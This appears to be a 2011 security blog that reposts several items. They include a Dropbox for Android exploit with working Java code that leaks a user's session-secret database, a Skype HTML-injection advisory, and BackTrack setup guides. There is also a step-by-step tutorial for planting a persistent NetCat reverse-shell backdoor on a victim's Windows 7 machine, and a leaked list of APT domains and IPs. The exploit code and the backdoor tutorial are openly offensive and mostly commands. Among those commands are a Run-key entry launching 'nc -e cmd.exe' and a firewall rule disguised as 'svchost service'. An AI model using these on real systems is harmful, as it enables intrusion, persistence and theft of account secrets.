Dropbox for Android Vulnerability Breakdown

Dropbox vulnerabilities are back and they’re mobile. This week Tyrone Erasmus released a vulnerability in the Android Dropbox client that allows other apps to access its content database allowing attackers to upload your files to the public. I wanted to break down this vulnerability because the lessons learned aren’t that Dropbox is vulnerable, it’s that bad Android programming practices are happening everywhere. Normally we don’t want any other apps to have access to another app’s content provider, so we block them all by default. This is done in a couple of ways. One by restricting the file permissions to only that the apps UID and GID. But in some cases, content providers want to share their information to other places on the Android platform. Take for example an email app that handles attachments.  The content provider should be secured so that other apps can’t access its emails, but if an email has an attachment like an image file, it may want to share that data with other apps like the Gallery Viewer. This is where URI permissions come into play as a way of sharing the content provider in a controlled way. Tyrone took advantage of the permissions allowed on a content provider for the Dropbox app.
Dropbox, for Android versions 1.1.3 and earlier, was setting the permissions of its content provider using the <grant-uri-permission> tag inside AndroidManifest.xml. There’s nothing wrong with that in itself, but grant-uri-permission takes a value of android:path, which is a path to the portions of the device that are allowed to access it. So what happens if that value is “/”?  Yeah. Exactly.

But what’s in this content provider. Lets take a look inside the Dropbox database in /data/app/com.dropbox.android/:

You’ll see that the database keeps track of the files that are being synced. What’s interesting to me is the _data field. When you want to add a file to Dropbox, a new record is created that fills in_data with the path of a location to upload. What happens if you were to tell it to upload something sensitive like  /data/data/com.dropbox.android/databases/prefs.db. The prefs.db contains the secret key and private information you can use to hijack a dropbox session. Telling it to store it into a location in the public folder will upload it to a world readable web address. Something like this:

http://dl.dropbox.com/u/xxxxxxxxx/prefs.db

Lets put this all together into a simple app.

package com.antitree.dropdropbox;

import android.app.Activity;
import android.os.Bundle;
import android.content.ContentValues;
import android.net.Uri;

public class DropDropBoxActivity extends Activity {

@Override
public void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);
setContentView(R.layout.<em>main</em>);
//begin exploit
Uri dropbox_uri = Uri.<em>parse</em>("content://com.dropbox.android.Dropbox/metadata/");
ContentValues values = <strong>new</strong> ContentValues();
//path to file to upload. Could also be a file on the sdcard
values.put("_data" , "/data/data/com.dropbox.android/databases/prefs.db");
//Without this the system won’t think the file needs syncing
values.put("local_modified" , 1);
//Tyrone’s logic flawthat blocks it from being able to be deleted
values.put("_display_name" , "");
values.put("is_favorite" , 1);
values.put("revision" , 0);
values.put("icon" , "page_white_text");
values.put("is_dir" , 0);
values.put("path" , "/Public/prefs.db");
values.put("canon_path" , "/public/prefs.db");
values.put("root" , "dropbox");
values.put("mime_type" , "text/xml");
values.put("thumb_exists" , 0);
values.put("parent_path" , "/Public/");
values.put("canon_parent_path" , "/public/");
this.getContentResolver().update(dropbox_uri, values, null, null);
}

}

This an example of what Tyrone created that will add a new record in the Dropbox content provider to tell it to upload the prefs.db to the user’s public folder. This is a pretty boring exploit example but with access to the sdcard and some malware kung-fu, I think you can dream up something much better.
The attack scenario for this vulnerability requires that the attacker have the ability to both install the malicious app on a user that’s using a version less than 1.1.4, and be able to find out the Dropbox ID to retrieve the files. If you’re a Dropbox user, the best way to protect yourself is update to the latest version which came out weeks ago. If you feel like you’ve already been exploited, you’ll need to change your passwords and re-enroll on the device. You may want to consider creating a new account if an attacker already has your user ID.
In the latest version 1.2.3, what’s interesting is that they didn’t change the AndroidManifest.xml permission issue at all. They put the entire app into secure storage. It resolves the issue this time but did it fix the bad programming practices? The take away for all this shouldn’t be that Dropbox has a vulnerability, but rather improper Android development practices are happening even with the larger projects like Dropbox.

Source: http://intrepidusgroup.com/insight/2011/08/dropbox-for-android-vulnerability-breakdown/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

BackTrack 5 r1 patch Wireless Driver rt2800usb

BackTrack 5 R1 contains patched stock kernel 2.6.39.4 wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.

rt2800usb

In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH and AWUS036NEH ALFAs) act strange with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it on your own. This specific version will work:

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2  
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14 
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch 
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch 
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch 
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch 
root@bt:~# make 
root@bt:~# make install
root@bt:~# reboot

Source: http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#rt2800usb

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Installing VMware Tools in BackTrack 5 R1

In case you need to manually install the VMware Tools you first have to prepare your kernel source by issuing the following commands:

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build

• Next on the VMware Player, we click Virtual Machine -> Install VMware Tools.
• Now let's quickly setup the VMware Tools by issuing the following commands:

root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom  /mnt/cdrom
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
root@bt:~# cd /tmp/
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz 
root@bt:~# cd vmware-tools-distrib/
root@bt:~# ./vmware-install.pl 

NOTE: After this a series of questions will come, if you are unsure about them just leave them default.
WHEN ASKED IF YOU WANT THE SCRIPT TO RUN VMWARE-CONFIG-TOOLS.PL FOR YOU, SAY NO!

• We now need to apply some patches to the VMWare kernel module sources before they are built. So:

Before running VMware Tools for the first time, you need to configure it by 
invoking the following command: "/usr/bin/vmware-config-tools.pl". Do you want 
this program to invoke the command for you now? [yes] no

• Now we apply the vmware-tools 2.6.39 patch:

root@bt:~# cd /usr/lib/vmware-tools/modules/source/
root@bt:~# for file in *.tar;do tar xpf $file;done
root@bt:~# rm *.tar
root@bt:~# wget www.backtrack-linux.org/vmtools2639.patch
root@bt:~# patch -p1 < vmtools2639.patch 
root@bt:~# for dir in $(ls -l |grep only|awk -F" " '{print $8}' |cut -d"-" -f1);do tar cvf $dir.tar $dir-only;rm -rf $dir-only;done
root@bt:~# vmware-config-tools.pl 

• If running in Mac Fusion, the patch won't apply cleanly. Accept the defaults and continue.
• Continue with the installation to the end, and hopefully all the VMWare modules should compile!
• bring back your pretty console and reboot:

root@bt:~# fix-splash
root@bt:~# shutdown -r 0

Source: http://www.backtrack-linux.org/wiki/index.php/VMware_Tools

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Backtrack 5 R1 was release

We’re finally ready to release BackTrack 5 R1. This release contains over 120 bug fixes, 30 new tools and 70 tool updates. We will be rolling out some howto’s on our wiki in the next few days, such as VMWare tool installation, alternate compat-wireless setups, etc. The kernel was updated to 2.6.39.4 and includes the relevant injection patches. As usual, please report bugs to us through our redmine ticket system for the fastest response. Don’t forget to also check our forums and wiki (will be updated in the next few days).

We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.
We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.

Lastly, I would like to thank the whole BackTrack team for pulling off the late nights working on this release, as well as Offensive Security for funding all of this stuff. If you need real world Penetration Testing Training – head on over to Offensive-Security and get ready for a bumpy ride!

Source: http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Skype - HTML/(Javascript) code injection

+-----------------------------------------------------------------------------+
|                   noptrix.net - Public Security Advisory                    |
+-----------------------------------------------------------------------------+


Date:
-----
08/17/2011

Vendor:
-------
Skype Limited - http://www.skype.com/

Affected Software:
------------------
Software: Skype
Version: <= 5.5.0.113

Affected Platforms:
-------------------
Windows (XP, Vista, 7)

Vulnerability Class:
--------------------
HTML/(Javascript) code injection

Description:
------------
Skype suffers from a persistent code injection vulnerability due to a lack
of input validation and output sanitization of following profile entries:
- home
- office
- mobile

Proof of Concept:
-----------------
The following HTML codes can be used to trigger the described vulnerability:

--- SNIP ---

Home Phone Number:
<b>INJECTION HERE</b>

Office Phone Number:
<center><i>INJECTION HERE</i></center>

Mobile Phone Number:
<a href="#">INJECTION HERE</a>

--- SNIP ---

For a PoC demonstration see:
    - http://www.noptrix.net/tmp/skype_inject.png

Impact:
-------
An attacker could for example inject HTML/Javascript code. It has not been
verified though, if it's possible to hijack cookies or to attack the underlying
operating system. Attacker could give a try using extern .js files...

Threat Level:
-------------
Low - ?

Solution:
---------
skype.com has to validate the input characters and sanitize the output.

Status:
-------
Skype hasn't fixed the issue yet.

Source: http://www.noptrix.net/advisories/skype_inject.txt 

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Howto: 10 Steps to Use NetCat as a Backdoor in Windows 7 System

Requirements :

1. NetCat

2. Meterpreter Script (you can get meterpreter script when successfully compromise victim with selected payload)

Step By Step :

1. The first step you need to gain an access to victim computer and get a meterpreter script for the payload ( I'm using java signed applet from my previous tutorial).

2. The next step you need to upload your NetCat.exe to victim computer by using following command :

upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

upload nc.exe and place it in C:\windows\system32 on victim computer

When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the tutorial privilege escalation here).

3. When upload process successful it will shown like this :

4. The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key "HKLM\software\microsoft\windows\currentversion\run".

Enumerate the supplied registry key :

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

5. Then add our NetCat into start up process by running this command :

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.

6. To check our backdoor autorun process and make sure it already added on autorun list :

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

7. Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 .

run shell command from meterpreter to access command prompt, and then run :

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

8. When success add our firewall rule, let's check and make sure our new rule has been added or not by using this command :

netsh firewall show portopening

9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :

nc -v victim_ip_address port

10. Let's try our backdoor by restarting the victim computer by using reboot command from meterpreter or shutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.

meterpreter > reboot

or

C:\windows\system32>shutdown -r -t 00

If our netcat show up a console, then we're successful inject a NetCat backdoor to victim computer.

Countermeasures :

1. When you have activated windows firewall, make sure you also have other personal firewall installed to detect inbound or outbound packet.

Hope it's useful 

Source: http://vishnuvalentino.com/computer/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Leak of APT domains

If you want to see all in the list, please go to the Source.

Hello security community.  I’ve compiled the following information for your viewing pleasure. 

 I hope this isn’t as misconstrued as http://www.secureworks.com/research/threats/htran/. 

This information is by no means the result of a singular analysis of a public Chinese hacking utility.

  At least three distinct threat groups were profiled in Joe Stewart’s analysis; however, no distinction was paid to the actual actors themselves as each was identified by a single means.

  I’m not going to pay homage to the other two actors, as I’m sure the US government and other private entities will have enough problems recovering from this singular data exposure. 

My motivation is purely selfless in nature and I only wish the security community to improve upon what has already been done in this realm. 

 Most of the security community is a fraud and continues to subsist on half-assed analyses and bogus data.

 All information was compiled from open sources and leaked information;

 no customer-based data was used for the analysis.  My sincerest apologies go out to those with ongoing monitoring operations on any of the IP addresses involved. 

These attacks have targeted US and Canadian companies almost exclusively for at least five years; the tools, tactics, and procedures have changed very little during that timeframe and continue to be extremely effective.
Several private companies currently monitor several of these IP addresses for the purpose of supplying stolen information back to the affected companies. 

Stolen data is effectively held hostage for the price of doing business with the company in the know.  On the other hand if you’re lucky, the government will notify you of a breach within six months or less.

  The more likely scenario though is that you will never hear a thing from anyone unless your business is of significant financial importance or you can afford to pay the exorbitant price of the private companies. 

Currently the FBI, AF OSI, and NCIS may provide these ‘notifications’ to affected companies.

 In recent years each branch has become significantly more segmented and isolated as such the overall quality of the information provided to the affected companies has degraded. 

Private entities continue to prosper off of this information to the tune of millions of dollars annually and the affected companies continue to leak money and data to the attackers. 

 I’m not of the mindset to define the attacker or their motivations; however, it’s easy to gleam that the interests are economic in nature and purely financial in motivation. 

 If your company is one outlined in the list below chances are you’re doing business in the Peoples’ Republic of China or plan to shortly. 

Negotiations are a common target for economically motivated hackers and hence email and other relevant information pertaining to contract negotiation data will be taken. 

 If you currently conduct business with the PRC chances are that your organization has knowingly or unknowingly been compromised. 
The domains presented below represent only a small fraction of those that are currently active and reflect only the activities of a singular group of individuals. 

The data has not been truncated and reflects several months of monitoring; non-routable IP addresses and google/yahoo domains are normal for inactive domains.   If you don’t know what to do with the information provide in this leak you deserve to continue to get fucked as you already have been, and you probably will be once again as tactics change.  This should not be construed as the totality of ongoing activity only a harbinger of what’s to come.  I have no allegiances, I make no money, I am not legion.

-RSA Employee #15666

----------------Begin Data----------------
08elec.purpledaily.com	64.233.169.147
09back.purpledaily.com	127.0.0.1
33bees.servebeer.com	220.128.105.177
3ml.infosupports.com	255.255.255.255
7cback.afraid.org	67.215.65.132
a-af.arrowservice.net	64.233.169.147
a-bne.arrowservice.net	64.233.163.104
a-if.arrowservice.net	64.233.169.147
aam.businessconsults.net	74.125.95.147
aar.bigdepression.net	12.14.129.91
aar.bigdepression.net	64.255.101.100
acli-mail.businessconsults.net	64.233.169.147
acu.businessconsults.net	150.176.164.6
adb.businessconsults.net	208.185.233.163
add.infosupports.com	255.255.255.255
addr.infosupports.com	255.255.255.255
admin.arrowservice.net	165.165.38.19
admin.softsolutionbox.net	74.125.93.105
adt.businessconsults.net	12.185.222.8
adtkl.newsonet.net	72.14.204.147
adtlk.bigish.net	74.14.204.147
aes.infosupports.com	216.15.210.68
aes.infosupports.com	74.93.92.50
af.arrowservice.net	207.46.17.125
afda.businessconsults.net	12.185.222.8
afw.globalowa.com	64.233.169.147
agl.softsolutionbox.net	64.233.169.147
ago.businessconsults.net	63.134.215.218
agru.qpoe.com	68.96.31.136
alarm.arrowservice.net	209.85.227.104
alcan.arrowservice.net	127.0.0.1
alion.businessconsults.net	208.44.242.11
amne.purpledaily.com	64.233.169.147
anglo.arrowservice.net	12.185.222.8
anglo.arrowservice.net	66.102.9.104
aol.arrowservice.net	208.69.32.230
aol.softsolutionbox.net	64.233.169.147
apa.infosupports.com	63.195.112.159
apa.newsonet.net	64.184.2.11
apa.newsonet.net	64.233.169.147
apa.safalife.com	66.228.132.20
apejack.bigish.net	64.233.169.104
apekl.newsonet.net	64.233.169.104
apple.blackcake.net	127.0.0.1
apple.infosupports.com	255.255.255.255
aps.bigdepression.net	255.255.255.255
apss.newsonet.net	64.233.169.147
ara.blackcake.net	208.37.108.211
ara.blackcake.net	255.255.255.255
ara.blackcake.net	64.26.31.5
ara.infosupports.com	208.37.108.211
ara.infosupports.com	255.255.255.255
ara.infosupports.com	64.26.31.5
ara2.blackcake.net	255.255.255.255
ara2.infosupports.com	255.255.255.255
arainfo.bigdepression.net	64.26.31.5
arainfo.infosupports.com	255.255.255.255
argsafhq.blackberrycluter.com	64.233.169.147
armi.arrowservice.net	216.45.6.3
asis.newsonet.net	69.147.76.15
asiv.softsolutionbox.net	12.185.222.8
asp.softsolutionbox.net	74.125.71.105
ass.globalowa.com	64.233.169.147
astone.newsonet.net	74.125.115.147
ati.arrowservice.net	63.134.215.150
ati.globalowa.com	127.0.0.12
ati2.globalowa.com	127.0.0.12
att.infosupports.com	208.44.242.32
att.infosupports.com	64.26.31.5
ausi.businessconsults.net	212.84.113.22
avph.earthsolution.org	209.172.51.139
bab.infosupports.com	255.255.255.255
back.earthsolution.org	127.0.0.1
back.worthhummer.net	127.0.0.18
backup.infosupports.com	255.255.255.255
bah.safalife.com	212.125.200.204
bah.safalife.com	66.162.37.179
bah001.blackcake.net	212.125.200.204
ball.dnsweb.org	127.0.0.1
bat.bigdepression.net	255.255.255.255
bat.blackcake.net	255.255.255.255
bat.infosupports.com	255.255.255.255
bbc.blackcake.net	255.255.255.255
bbh.dnsweb.org	209.172.51.139
bcc.blackberrycluter.com	64.233.169.147
bda.arrowservice.net	208.185.233.163
bee.businessconsults.net	12.38.236.21
bhbt.newsonet.net	64.221.131.174
bksy.businessconsults.net	161.58.177.111
bll.dnsweb.org	127.0.0.1
blue.infosupports.com	255.255.255.255
bmms07.bm.ust.hk	143.89.35.7
bob.dnsweb.org	12.14.129.91
bobo.buisnessconsults.net	127.0.0.1
bot.bigdepression.net	255.255.255.255
bphb.arrowservice.net	127.0.0.60
bswt.purpledaily.com	67.195.160.76
built.arrowservice.net	72.14.254.104
business.chileexe77.com	209.136.47.214
business.infosupports.com	255.255.255.255
buyer.arrowservice.net	127.0.0.1
buz.businessconsults.net	127.0.0.18
caaid.newsonet.net	143.89.56.207
cac.bigdepression.net	24.96.236.181
cac.worthhummer.net	161.58.182.205
caci.blackcake.net	127.0.0.1
caci.businessconsults.net	212.125.200.204
caci.infosupports.com	212.125.200.204
caci.infosupports.com	216.249.111.232
caci.safalife.com	66.162.37.179
caci2.infosupports.com	212.125.200.204
cacq.bigdepression.net	209.172.51.139
cadfait.softsolutionbox.net	66.249.91.104
cais.blackcake.net	255.255.255.255
car1.bigdepression.net	66.228.132.129
carpgallery.longmusic.com	174.36.200.35
carvin.infosupports.com	209.85.229.103
catalog.earthsolution.org	72.167.34.54
cbc.purpledaily.com	64.233.169.147
ccb.blackberrycluter.com	127.0.0.1
ccsukl.purpledaily.com	194.106.162.203
ccsukl.purpledaily.com	72.14.204.104
cdc01.hugesoft.org	64.233.169.1
cdc01.hugesoft.org	64.233.169.147
cdcd.newsonet.net	64.233.169.147
cdd.purpledaily.com	64.233.169.147
center.arrowservice.net	64.233.163.99
center.infosupports.com	255.255.255.255
ceros.buisnessconsults.net	68.96.31.136
chamus.gmailboxes.com	143.89.132.99
chamus.gmailboxes.com	194.106.162.203
chamus.gmailboxes.com	63.162.42.46
chamus.gmailboxes.com	64.233.169.104
chamus.gmailboxes.com	70.90.53.170
chq.newsonet.net	127.0.0.1
cib.businessconsults.net	63.134.215.129
cibuc.blackcake.net	255.255.255.255
citrix.globalowa.com	127.0.0.10
climate.newsonet.net	127.0.0.8
clin.earthsolution.org	161.58.177.111
cman.blackcake.net	66.228.132.20
coco.purpledaily.com	127.0.0.1
cok.purpledaily.com	64.233.169.147
comfile.softsolutionbox.net	61.9.147.196
contact.arrowservice.net	127.0.0.120
contact.ignorelist.com	72.14.213.147
contact.purpledaily.com	12.185.222.8
control.arrowservice.net	208.48.53.218
control.blackberrycluter.com	74.125.77.104
cook.globalowa.com	63.134.215.150
cool.newsonet.net	216.55.83.12
copierexpert.com	207.225.36.69
corp.purpledaily.com	208.44.242.11
count.blackcake.net	255.255.255.255
cov.arrowservice.net	204.100.63.18
covclient.arrowservice.net	204.100.63.18
cow.arrowservice.net	127.0.0.16
cowboy.bigish.net	64.233.169.104
crab.arrowservice.net	203.170.198.56
crazycow.homenet.org	143.89.132.99
crazycow.homenet.org	64.233.169.104
create301.dyndns.info	204.45.228.140
csba.bigdepression.net	255.255.255.255
csc.businessconsults.net	161.58.182.205
csch.infosupports.com	216.47.214.42
csupp.bigish.net	64.126.12.3
ctch.earthsolution.org	209.172.51.139
ctcn.dns2.us	66.192.230.86
ctcn.purpledaily.com	68.96.31.136
ctcs.bigdepression.net	127.0.0.1
ctisk.purpledaily.com	194.106.162.203
ctx.safalife.com	72.14.213.147
culture.chileexe77.com	24.207.42.66
daa.bigdepression.net	12.14.129.91
daa.bigdepression.net	66.228.132.16
date.gmailboxes.com	140.112.19.195
dcs.ygto.com	127.0.0.1
dcs.ygto.com	74.93.92.50
default.arrowservice.net	74.125.87.147
den.blackcake.net	255.255.255.255
denel.businessconsults.net	127.0.0.1
des.blackcake.net	255.255.255.255
des.infosupports.com	216.15.210.68
des.infosupports.com	255.255.255.255
dev.teamattire.com	68.166.53.102
dfait-kl.worthhummer.net	66.249.91.104
dgih.dnsweb.org	72.240.45.65
dias.globalowa.com	64.233.169.147
dns.chileexe77.com	70.108.241.36
dns.issnbgkit.net	66.118.61.226
dnsg.bigdepression.net	127.0.0.1
doa.bigdepression.net	12.14.129.91
doa.bigdepression.net	212.125.200.204
doa.bigdepression.net	66.228.132.16
dod.dnsweb.org	66.111.37.26
domain.arrowservice.net	74.125.87.147
dotnet.safalife.com	66.250.218.2
dove.blackcake.net	208.37.108.211
dove.blackcake.net	255.255.255.255
dove.blackcake.net	64.26.31.5
down.safalife.com	66.228.132.16
drs.infosupports.com	66.228.132.20
drs.safalife.com	127.0.0.1
dsh.newsonet.net	68.165.211.181
dsw.blackcake.net	255.255.255.255
dsw.blackcake.net	64.26.31.5
dvid.blackcake.net	255.255.255.255
dvid.blackcake.net	64.26.31.5
dvid.infosupports.com	255.255.255.255
dvid.infosupports.com	64.26.31.5
dvn.newsonet.net	64.233.169.147
dyn.newsonet.net	64.14.81.30
dyns.infosupports.com	127.0.0.1
ecc.bigdepression.net	127.0.0.1
ecc.safalife.com	66.228.132.53
eds1.infosupports.com	255.255.255.255
eds1.infosupports.com	64.26.31.5
egcc.bigdepression.net	127.0.0.1
email.hugesoft.org	208.185.233.163
email.hugesoft.org	64.126.12.3
engineer2010.mynumber.org	12.38.236.41
epi.newsonet.net	209.85.227.103
epi.newsonet.net	64.8.114.124
epi.purpledaily.com	64.233.169.147
epic.purpledaily.com	64.4.21.91
epod.businessconsults.net	127.0.0.1
ever.arrowservice.net	74.125.79.99
explorer.pcanywhere.net	98.137.149.56
eye.businessconsults.net	127.0.0.1
fed.purpledaily.com	127.0.0.1
ffej.newsonet.net	127.0.0.1
ffej.purpledaily.com	64.233.169.147
fher.bigish.net	74.12.204.147
fher.buisnessconsults.net	74.12.204.147
fher.businessconsults.net	74.12.204.147
fhh.purpledaily.com	74.12.204.147
fim.purpledaily.com	194.106.162.203
fim.purpledaily.com	64.233.169.147
finance.chileexe77.com	212.159.25.242
fine.worthhummer.net	127.0.0.1
fineca.blackberrycluter.com	194.106.162.203
fineca.newsonet.net	194.106.162.203
fineca.newsonet.net	66.249.80.104
finekl.bigish.net	66.249.80.104
finekl.purpledaily.com	64.184.2.11
finekl.worthhummer.net	194.106.162.203
fjod.businessconsults.net	64.233.169.147
flashingaway.otzo.com	174.36.200.35
flucare.worthhummer.net	194.106.162.203
fly.blackcake.net	255.255.255.255
fmcc.businessconsults.net	64.233.169.147
fmp.bigish.net	209.85.147.104
fmp.worthhummer.net	209.85.147.104
fnem.businessconsults.net	72.14.204.104
fnpc.arrowservice.net	64.12.79.57
fnrn.businessconsults.net	173.194.32.104
free.gmailboxes.com	207.173.155.44
friends.arrowservice.net	209.85.173.99
fstl.businessconsults.net	74.125.113.147
fstl.worthhummer.net	67.132.222.230
ftp.freespirit.acmetoy.com	127.0.0.1
ftp.purpledaily.com	209.85.148.105
ftrj.businessconsults.net	64.233.169.147
fwb.blackcake.net	212.125.200.204
fwmo.businessconsults.net	208.185.233.163
fwmo.newsonet.net	70.90.53.170
gaca.newsonet.net	143.89.132.99
gannett.infosupports.com	255.255.255.255
gatu.arrowservice.net	70.90.53.170
gayi.blackcake.net	24.123.243.218
gdaa.ns02.info	72.242.59.164
gdsp.infosupports.com	127.0.0.1
gdtm.earthsolution.org	209.172.51.139
gege.newsonet.net	216.143.158.107
gg.arrowservice.net	64.233.169.147
ghma.earthsolution.org	127.0.0.1
ghma.earthsolution.org	68.96.31.136
gjjr.newsonet.net	207.225.36.69
glj.purpledaily.com	64.233.169.147
global.softsolutionbox.net	70.90.53.170
glx.newsonet.net	209.85.227.103
gmail.bigdepression.net	74.93.92.50
gmail.infosupports.com	212.125.200.197
green.safalife.com	255.255.255.255
ground.earthsolution.org	207.157.116.130
ground.infosupports.com	127.0.0.1
half.earthsolution.org	72.242.59.165
half.infosupports.com	212.125.200.197
happy.arrowservice.net	127.0.0.1
hapyy2010.lflinkup.net	12.38.236.41
hav.earthsolution.org	127.0.0.1
hav.earthsolution.org	68.96.31.136
help.purpledaily.com	12.185.222.8
help.purpledaily.com	74.125.79.99
hill.arrowservice.net	64.233.189.104
home.arrowservice.net	64.233.189.99
host.arrowservice.net	127.0.0.1
host.issnbgkit.net	65.105.157.228
hotel.safalife.com	64.254.247.13
hotel.safalife.com	66.111.37.26
house.globalowa.com	72.14.204.103
house.gmailboxes.com	72.14.204.103
hpd.newsonet.net	64.12.75.1
hrsy.newsonet.net	64.233.169.147
hy.purpledaily.com	64.233.169.147
hy.worthhummer.net	127.0.0.1
iabk.newsonet.net	64.233.169.147
iea.businessconsults.net	127.0.0.1
imgmobile.anxa.com	209.172.51.139
index.arrowservice.net	74.125.155.103
india.arrowservice.net	64.4.21.91
indian.arrowservice.net	64.4.21.91
info.bigish.net	127.0.0.1
info.businessconsults.net	12.38.236.21
info.businessconsults.net	12.38.236.41
info.businessconsults.net	127.0.0.1
info.softsolutionbox.net	127.0.0.1
ins.globalowa.com	64.233.169.147
ins.purpledaily.com	64.233.169.147
intel.infosupports.com	68.96.31.136
inter.earthsolution.org	127.0.0.1

Source: http://pastebin.com/raw.php?i=yKSQd5Z5 

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00